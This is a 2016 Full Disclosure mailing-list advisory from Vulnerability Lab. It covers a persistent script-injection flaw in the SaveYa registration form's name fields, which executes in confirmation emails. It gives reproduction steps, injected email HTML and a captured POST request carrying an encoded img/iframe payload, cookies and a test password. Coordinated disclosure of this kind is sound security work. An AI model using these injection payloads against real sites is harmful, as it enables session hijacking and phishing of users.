[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [FD] Saveya Bounty #1 - Bypass & Persistent Vulnerability
From:       Vulnerability Lab <research () vulnerability-lab ! com>
Date:       2016-07-28 10:05:00
Message-ID: ad2fc2e7-5270-be8a-fa03-ca91c60f7ea1 () vulnerability-lab ! com
[Download RAW message or body]

Document Title:
===============
Saveya Bounty #1 - Bypass & Persistent Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1857

SaveYa ID: 56

Acknowledgements: https://www.saveya.com/white-hat-program-acknowledgements


Release Date:
=============
2016-07-26


Vulnerability Laboratory ID (VL-ID):
====================================
1857


Common Vulnerability Scoring System:
====================================
3.7


Product & Service Introduction:
===============================
As one of the leading gift card exchanges, SaveYa passes along the savings to you by buying \
unwanted gift cards. In turn, gift cards from many popular  retailers are sold at a discount, \
below face value, and you can save big time on your everyday or one time expenses. Browse or \
search our extensive list  of discounted gift cards for today's most popular retailers before \
you make that next big purchase. If you are a shopper on the go, you can download our  discount \
gift card app to save even more instantly. Our one of a kind savings app alerts you before \
checkout in order to take advantage of potential  savings by buying discounted gift cards.

(Copy of the Vendor Homepage: https://www.saveya.com/ )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered an application-side input validation \
vulnerability and filter bypass issue in the Saveya web-application.


Vulnerability Disclosure Timeline:
==================================
2016-06-15: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2016-06-17 Vendor Notification (Saveya Security Team - Bug Bounty Program)
2016-06-18: Vendor Response/Feedback (Saveya Security Team - Bug Bounty Program)
2016-07-25: Vendor Fix/Patch (Saveya Site Service Developer Team)
2016-07-26: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Saveya
Product: Saveya - Online Service (Web-Application) 2016 Q2


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
An application-side input validation and mail encode web vulnerability has been discovered in \
the official Saveya online service web-application. The application-side vulnerability allows \
remote attacker to inject own malicious script codes to the application-side of the vulnerable \
module or function.

The vulnerability is located in the `Firstname` and `Lastname` parameter values of the \
`./Register` module POST method request. Remote attackers are able  to inject own malicious \
script codes to the application-side of the profile values. After the registration a confirm \
and verification email is send by the  service with the firstname and lastname values in the \
message body. Thus values are wrong encoded and can execute persistent injected script codes.

The security risk of the application-side mail encode web vulnerability is estimated as medium \
with a cvss (common vulnerability scoring system) count of 3.8.  Exploitation of the persistent \
input validation web vulnerability requires no privileged web-application user account and low \
or medium user interaction.  Successful exploitation of the vulnerability results in session \
hijacking, persistent phishing attacks, persistent external redirects to malicious source  and \
persistent manipulation of affected or connected application modules.

Request Method(s):
				[+] POST

Vulnerable Module(s):
				[+] Register - Account Registration SaveYa

Vulnerable Parameter(s):
				[+] Firstname
				[+] Lastname

Affected Module(s):
				[+] Verify Email
				[+] Account Congratulation Email


Proof of Concept (PoC):
=======================
The persistent vulnerability can be exploited by remote attackers without privileged \
web-application user account and with low user interaction. For security demonstration or to \
reproduce the vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Open the Saveya website
2. Click to Signup module
3. The registration form opens
4. Inject random values and a target attack email to include via POST
5. Inject to the Firstname and Lastname input field values your own malicious script code
6. Save the request via POST submit
7. Check the inbox
8. First the email of the verify arrives and after that the email congratulation account to \
                verify
Note: In both emails the persistent injected script code executes in the message body context
9. Successful reproduce of the remote mail encode web vulnerability and input validation issue


PoC #1: Welcome Email
<tr><td> <table style="border-spacing:0;border-collapse:collapse;width:100%">
<tbody><tr>
<td style="padding-top:20px;">
<p>Welcome "&gt;&lt;"[PERSISTENT INJECTED SCRIPT CODE EXECUTE!]<img src="x">%20%20&gt;"<iframe \
src="a">%20<iframe>!</p> <p><p>We are excited to start your savings! To maintain a safe gift \
card exchange for our Buyers and Sellers, click the following link to confirm your email</p> <a \
href="https://saveya.com/verify/email/BDugbGkoZSMZtv5gyIyIXIqnpoaTYZne">https://saveya.com/verify/email/BDugbGkoZSMZtv5gyIyIXIqnpoaTYZne</a>
 </p><p>&nbsp;</p>
</td></tr></tbody>
</table>


PoC #2: Congratulations Email Account
<tr><td>
<table style="border-spacing:0;border-collapse:collapse;width:100%">
<tbody><tr>
<td style="padding-top:20px;">
<p>Congratulations "&gt;&lt;"[PERSISTENT INJECTED SCRIPT CODE EXECUTE!]<img \
src="x">%20%20&gt;"<iframe src="a">%20<iframe>!</p> <p>We&#39;re excited to have you join the \
millions of people who love a great deal and are using technology to discover the best \
savings.</p> <p style="padding-top:20px">Log in now and let&#39;s start saving! 
<a href="https://saveya.com/login?utm_source=website&amp;utm_medium=email&amp;utm_campaign=signup">https://saveya.com/login</a></p>
 </td></tr></tbody>
</table>


--- PoC Session Logs [POST] ---
Status: 302[Found]
POST https://www.saveya.com/register
Mime Type[text/html]
   Request Header:
      Host[www.saveya.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate, br]
      Referer[https://www.saveya.com/register]
      Cookie[PHPSESSID=33v3vavabp7hagmti0dgb47f50; device_view=full; \
saveya_cart_token=48c646fbf38b7a8ea2a7d61e98046157c76983bce6198447ce488adaf4887a8c;  \
_ga=GA1.2.1932054624.1466150590; GSIDjkWRttymeafj=1af66ccb-deae-441d-b2e4-5ef9217c94c3; \
STSD190022=0; STSID190022=59c3febf-a651-4e83-9bb1-85755c92113f;  \
D_SID=91.59.66.192:Kv9klAfp7orEq6woodpGtWjlJ0BG/8iXQRcEeAdvdTo; \
D_PID=1CFD7DCE-572E-3764-9239-4718E145198D; D_IID=6239827F-3F71-3084-846B-29ACC3BC0F30;  \
D_UID=C6C6ABC7-6CC3-3B8C-AD5E-793C07AB3C06; D_HID=2J0KBBFZ4q4uK+XfSbYf98AeSaLG/WqQqRlOQY5Upeg; \
ltk-subscribed=Account; _dc_gtm_UA-56192108-1=1]  Connection[keep-alive]
   POST-Daten:
      register%5Bfirst_name%5D[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
                
      register%5Blast_name%5D[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
  register%5Busername%5D[bkm%40evolution-sec.com]
      register%5Bpassword%5D%5Bfirst%5D[Keygen445%21%21%21]
      register%5Bpassword%5D%5Bsecond%5D[Keygen445%21%21%21]
      register%5Bdate_of_birth%5D[02%2F20%2F1980]
      register%5Bphone_number%5D[%28021%29+115-2323]
      register%5Bgoogle_client%5D[1932054624.1466150590]
      register%5Bis_newsletter_subscriber%5D[1]
      register%5B_token%5D[ljxgjddaWUWDyj_f9CbzdjV1NUdsClwo9W4TzEgeKD4]
      agreedTerms[agreed]
      g-recaptcha-response[03AHJ_VutZLpkWHzGXigJ3Xyhh4JrPsJWUIOiJ3xrh-JDLoA4a8CWWkkPRGELGZfnVEGcmQJvZHFqR0QtZrZ9hVqLf2QXg3yZq1lE8AZpXNd9q7IaVyc0TIytZ9KyeOL
 fL6uHPSOnpQ0xyHCj9iDap7g1yrhNIQ3UHAlpubKEeY8yseJO9D1NVa__1KbbkfWgkX0hI8RGl-nZTCAMEcApy4js6skNQ14JTVhlj8F1BOK-3Wun78njvE320y4Bc6xoWBrRNMLtRiNS-o46UgdF_oGFxU
 uuce6vVuz-ccAdL8xV79JnwTSbcEYsQbsYojUzXXT8NeoX8JxqrZKet3Tf8zkzFxx9mnkenAptWHCFX7MEhLJmtFCG2KQ9e \
S8sTHL9OTIH3LwlwSgzoeoGiIoBuXMb9oJtwVzLf-MW4jG_ypIfDY4AG9vNop9_It3_0vRsZyhunloQ_AgOyl9WB9yVBY166 \
EnROUo6HU3OWTWp0Gn7PVIQ5FOhmSWLZe_rcCoToqGAnjbaJhgydgYFAaAak9GNA-84VPENp8fe-Dnv-VldosJEcA5c0Fado \
LLmfXbSLiXrgml5KtTf_AL8sG3JIK4rU8UevCIfeVQ09O3E0BlHyRa8T3nzIhfuv3Dx41NmaVUM7QQJfZ3HKZg1kgwU-1ZjfBJdoJZ5wPYqIa3Nv9irKuRpEvnPu3wIfPMbUArIlGFK
 n30LeEuzg2PQO-cnz0Ch4YrwrXonIvUneyZ738cnJIgsb9tV0kazJc5sP8aS30Fz1GZ0qIi9a7KaMu22HHgxgbnAx1DLv2082WHnXfhcXpv3OMTyz0z3Mx6ypiryPA0FRgcedhWDIr7JhL1pl6UUtNkcbPUz
 qaXRkrb9in_-7rFfKJiJsw_-eT0FGwYmRRK18sEaa_gmp3h4ay_iF79k84bDI2IlT1a2DhXL_tJmCDOxJVrVXxavG5OIVnH \
zxv5MX8DNrVnHXACVZXFA0TXIBxTSf5BmyAd7wqe99Dj7xbbV1m5jSVGj8xJE08wtD4o_tneeo9XdB_PKWPXrK \
1qcCMzh5hrEF_oHdST9ydl_x1qSQfaKy4rm1nAwl1FnpdhgNeei5jdN5dbnI79D-Fo6aCnnBBoA-_8rgI4U7UvXQ3YgvYt0CeyKAv9pWb5-40mwX0931WAxB6cE9PbjRneiXBa4m6LIO90TJ_lMDhju-yUS
 UvgCp9y-PczsFpepOBumtc4CkBiMckjQjezcYd2K8li2lbOEedu2OlT0RQJ54066J6jZ64yiikAxzYbvlkfXSoiiT6Vf3xiraN3jPFPapzFYAWUjv3mDoaCx1MP5KU_7D2UHrEkPPe75YmyMegfF7jZmfNNzShmOIkwy
 uacEWdgCOel7v_4aBn_BcXOenhliX3mFjmjFixYZTK_uiEuOgdP5MhIzbshGYTDuthFXSoCooT2oC-1vP10kd-divGjHH9j \
aiso2_GdGMBbm8tMTndAK1JnDFYQNYoZEP9r1_eAf3CDsJoip4Z3Ylfl2pZWA383a8jMFOFx9O9qCrfDAx4ZkF3QAcBi8HAeKHROfENnfCgUi5amgKimQNBUn0ir1YcCAnAGE8rdoeO3xzBB36uo
 k2noIzEPzaLiluWjaZ-gShybVRQvCAjji1r75PFjLPZzJ2kG5f0tl3iioU7e-QPSHuImCHKiDFigueIapx4AQGIljja3Au2e-L9O_RqMy2Uyx3dEmmcoH4K8MpK40Amntgqh5vQ6ExcbjHw3rbZe4gqMO8F1
 mDZCfm__kuwFlDf9o31SL7CDnW-LMSpVri1QayxnBzd31spQ7WKUxa6udMJOIYUZC7GYU89EKd2bsLXCqBdw661BDOM4lGxcmuBJVFxlugYTNvYL-bdGOAJTGv6R4UExBg72j14sqcWDZslFSGoYYMdABj47C8y-Y5YDIrh_gJ]
  Response Header:
      Server[nginx]
      Date[Fri, 17 Jun 2016 08:16:41 GMT]
      Content-Type[text/html; charset=UTF-8]
      Connection[keep-alive]
      Location[https://www.saveya.com/white-hat-program]
      Request-Id[5763b1bfaeafd6.81829986]


Reference(s):
https://www.saveya.com/
https://www.saveya.com/register


Solution - Fix & Patch:
=======================
2016-07-25: Vendor Fix/Patch (Saveya Site Service Developer Team)


Security Risk:
==============
The security risk of the application-side input validation web vulnerability in the saveya \
online service web-application is estimated as medium. (CVSS 3.7)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) \
[www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability Lab disclaims all warranties, either expressed or implied,  including the \
warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its \
suppliers are not liable in any case of damage,  including direct, indirect, incidental, \
consequential loss of business profits or special damages, even if Vulnerability-Lab or its \
suppliers have been advised  of the possibility of such damages. Some states do not allow the \
exclusion or limitation of liability for consequential or incidental damages so the foregoing  \
limitation may not apply. We do not approve or encourage anybody to break any licenses, \
policies, deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com 		- www.vuln-lab.com 						- www.evolution-sec.com
Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 				- \
                admin@evolution-sec.com
Section:    magazine.vulnerability-lab.com 	- vulnerability-lab.com/contact.php 				- \
                evolution-sec.com/contact
Social:	    twitter.com/vuln_lab		- facebook.com/VulnerabilityLab 				- \
                youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php 	- vulnerability-lab.com/rss/rss_upcoming.php 			- \
                vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php 	- \
vulnerability-lab.com/list-of-bug-bounty-programs.php 	- vulnerability-lab.com/register.php

Any modified copy or reproduction, including partially usages, of this file requires \
authorization from Vulnerability Laboratory. Permission to electronically  redistribute this \
alert in its unmodified form is granted. All other rights, including the use of other media, \
are reserved by Vulnerability-Lab Research Team or  its suppliers. All pictures, texts, \
advisories, source code, videos and other information on this website is trademark of \
vulnerability-lab team & the specific  authors or managers. To record, list, modify, use or \
edit our material contact (admin@ or research@vulnerability-lab.com) to get a ask permission.

				    Copyright  © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]â„¢

-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com



_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic